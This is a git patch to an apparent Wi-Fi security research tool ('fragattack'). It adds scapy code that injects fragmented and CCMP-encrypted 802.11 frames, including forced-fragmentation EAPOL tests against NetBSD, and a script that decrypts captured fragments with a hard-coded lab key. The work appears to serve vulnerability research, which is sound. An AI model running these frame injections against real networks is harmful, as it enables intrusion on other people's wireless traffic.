From 20b60570ca3de9d0345a589eb52c9d4705530c67 Mon Sep 17 00:00:00 2001 From: Mathy Date: Sun, 1 Mar 2020 19:03:08 -0500 Subject: [PATCH] fragattack: netbsd force fragment experiments --- research/inject.py | 124 +++++++++++++++++++++++++++++++------- research/post-analysis.py | 42 +++++++++++++ 2 files changed, 145 insertions(+), 21 deletions(-) create mode 100755 research/post-analysis.py diff --git a/research/inject.py b/research/inject.py index 3b6e0225c..4b058a624 100755 --- a/research/inject.py +++ b/research/inject.py @@ -1,8 +1,16 @@ #!/usr/bin/env python3 -from libwifi import* +from libwifi import * import sys, socket, struct, time, subprocess, atexit, select from wpaspy import Ctrl +# NOTES: +# - The ath9k_htc devices by default overwrite the injected sequence number. +# However, this number is not increases when the MoreFragments flag is set, +# meaning we can inject fragmented frames (albeit with a different sequence +# number than then one we use for injection this this script). +# Overwriting the sequence can be avoided by patching `ath_tgt_tx_seqno_normal` +# and commenting out the two lines that modify `i_seq`. + #def main(interface): # conf.iface = interface + "mon" # inject_fragmented() @@ -69,9 +77,30 @@ class FragAttack(): sendp(RadioTap()/frag2, iface=self.nic_mon) sendp(RadioTap()/frag3, iface=self.nic_mon) - def inject_fragments(self, ping=False, num_frags=3): - seqnum = 0xAA - addr3 = MAC_STA2 + + def send_fragmented(self, header, data, num_frags): + fragments = [] + fragsize = (len(data) + 1) // num_frags + for i in range(num_frags): + frag = header.copy() + frag.SC |= i + if i < num_frags - 1: frag.FCfield |= Dot11(FCfield="MF").FCfield + + payload = data[fragsize * i : fragsize * (i + 1)] + frag = frag/Raw(payload) + if self.tk: + print("\n\tTODO: Double-check code to encrypted fragments!\n") + frag = encrypt_ccmp(frag, self.tk, self.pn) + self.pn += 1 + print(repr(frag)) + fragments.append(RadioTap()/frag) + + for i in range(100): + time.sleep(0.2) + sendp(fragments, iface=self.nic_mon) + + + def inject_fragments(self, ping=False): if ping: data = raw(LLC()/SNAP()/IP(dst="192.168.4.100", src="192.168.4.101")/ICMP()) else: @@ -113,19 +142,19 @@ class FragAttack(): # TODO: Inject a very large (>2346 single-frame Wi-Fi frame) data = b"A" * 3000 - fragments = [] - fragsize = (len(data) + 1) // num_frags - for i in range(num_frags): - fc = "to-DS" if i == num_frags - 1 else "to-DS+MF" - payload = data[fragsize * i : fragsize * (i + 1)] - frag = Dot11(type="Data", FCfield=fc, addr1=self.apmac, addr2=self.clientmac, addr3=addr3, SC=(seqnum << 4) | i)/Raw(payload) - if self.tk: frag = encrypt_ccmp(frag, self.tk, self.pn) - fragments.append(RadioTap()/frag) - #fragments.append(RadioTap()/frag) + seqnum = 0xAA + header = Dot11(type="Data", FCfield="to-DS", addr1=self.apmac, addr2=self.clientmac, addr3=MAC_STA2, SC=(seqnum << 4)) + self.send_fragmented(header, data, num_frags=3) + + def inject_eapol(self, numbytes=16): + # This test is supposed to be executed before authenticating with the AP + assert self.tk == None + + seqnum = 0xAA + header = Dot11(type="Data", FCfield="to-DS", addr1=self.apmac, addr2=self.clientmac, addr3=MAC_STA2, SC=(seqnum << 4)) + data = raw(LLC()/SNAP()/EAPOL()/EAP()/Raw(b"A" * 2600)) + self.send_fragmented(header, data, num_frags=2) - for i in range(100): - time.sleep(2) - sendp(fragments, iface=self.nic_mon) def inject_ping(self, numbytes=16): addr3 = MAC_STA2 @@ -160,7 +189,12 @@ class FragAttack(): msg =self.wpasupp_ctrl.recv() log(STATUS, "wpasupp: " + msg) - if "CTRL-EVENT-CONNECTED" in msg: + if "Trying to authenticate with" in msg: + # Example: "SME: Trying to authenticate with 00:0c:f6:22:d2:11 (SSID='mathynet' freq=2412 MHz)" + p = re.compile("Trying to authenticate with (.*) \(SSID") + self.apmac = p.search(msg).group(1) + + elif "CTRL-EVENT-CONNECTED" in msg and self.options.test == TestOptions.Inject_LargeFrag: p = re.compile("Connection to (.*) completed") self.apmac = p.search(msg).group(1) self.get_tk() @@ -169,6 +203,10 @@ class FragAttack(): self.inject_fragments() #self.inject_ping(numbytes=2000) + elif "EAPOL-TX" in msg and self.options.test == TestOptions.ForceFrag_EAPOL: + # XXX - Inject large EAPOL frame through AP to force fragmentation towards STA + self.inject_eapol() + def configure_interfaces(self): log(STATUS, "Note: disable Wi-Fi in your network manager so it doesn't interfere with this script") @@ -187,7 +225,8 @@ class FragAttack(): subprocess.check_output(["iw", self.nic_mon, "set", "type", "monitor"]) subprocess.check_output(["ifconfig", self.nic_mon, "up"]) - def run(self): + def run(self, options): + self.options = options self.configure_interfaces() self.sock = MonitorSocket(type=ETH_P_ALL, iface=self.nic_mon) @@ -216,6 +255,11 @@ class FragAttack(): log(ERROR, "Did you disable Wi-Fi in the network manager? Otherwise wpa_supplicant won't work.") raise + # Configure things for the specific test we are running + if self.options.test == TestOptions.ForceFrag_EAPOL: + # Intercept EAPOL packets that the client wants to send + wpaspy_command(self.wpasupp_ctrl, "SET ext_eapol_frame_io 1") + # Monitor the virtual monitor interface of the client and perform the needed actions while True: sel = select.select([self.sock, self.wpasupp_ctrl.s], [], [], 1) @@ -233,14 +277,52 @@ class FragAttack(): def cleanup(): attack.stop() + +class TestOptions(): + ForceFrag_EAPOL, Inject_LargeFrag, Attack_LinuxInject = range(3) + + def __init__(self): + self.test = None + +def argv_pop_argument(argument): + if not argument in sys.argv: return False + idx = sys.argv.index(argument) + del sys.argv[idx] + return True + + if __name__ == "__main__": - if len(sys.argv) != 2: - print("Usage:", sys.argv[0], "interface") + if "--help" in sys.argv or "-h" in sys.argv: + print("\nSee README.md for usage instructions.") quit(1) + options = TestOptions() + + # Parse the type of test variant to execute + force_frag = argv_pop_argument("--force-frag") + inject_largefrag = argv_pop_argument("--replay-unicast") + attack_linux = argv_pop_argument("--group") + if force_frag + inject_largefrag + attack_linux > 1: + print("You can only select one test") + quit(1) + if force_frag: + options.test = TestOptions.ForceFrag_EAPOL + elif inject_largefrag: + options.test = TestOptions.Inject_LargeFrag + elif attack_linux: + options.test = TestOptions.Attack_LinuxInject + else: + print("No test option was specified, exiting.") + quit(1) + + # Parse remaining options + while argv_pop_argument("--debug"): + libwifi.global_log_level -= 1 + + # Now start the tests attack = FragAttack(sys.argv[1]) atexit.register(cleanup) - attack.run() + attack.run(options=options) main() diff --git a/research/post-analysis.py b/research/post-analysis.py new file mode 100755 index 000000000..e132caaf7 --- /dev/null +++ b/research/post-analysis.py @@ -0,0 +1,42 @@ +#!/usr/bin/env python3 +from libwifi import * + +def netbsd_forcefrag_verify(): + # Capture made using independent TL-WN722N + cap = rdpcap("../../captures/netbsd-forward-eapol-before-auth-fragmented-1.pcapng") + fragments = [] + fragments.append(cap[1204][Dot11]) + fragments.append(cap[1207][Dot11]) + fragments.append(cap[1262][Dot11]) + fragments.append(cap[1262][Dot11]) + fragments.append(cap[1266][Dot11]) + fragments.append(cap[1270][Dot11]) + fragments.append(cap[1277][Dot11]) + fragments.append(cap[1355][Dot11]) + + # Taken from debug output hostapd on NetBSD + tk = "b7 2a 27 4c 50 6b c1 3b 86 3d 9a 97 fe 85 8b c9" + tk = bytes.fromhex(tk.replace(" ", "")) + + print("Testing decryption") + for frag in fragments: + decrypt_ccmp(frag, tk) + + # Encrypt newly constructed packet + pt = fragments[0].copy() + pt.remove_payload() + # Note: the import to give the original number of A's so the EAPOL length + # fields are properly reconstructed. After this, we trim the length. + payload = LLC()/SNAP()/EAPOL()/EAP(raw(EAP()/Raw(b"A" * 2600))) + pt = pt/raw(payload)[:2314] + test = encrypt_ccmp(pt, tk, pn=1) + + print("Testing reconstructed encryption") + assert raw(fragments[0]) == raw(test) + +def main(): + netbsd_forcefrag_verify() + +if __name__ == "__main__": + main() +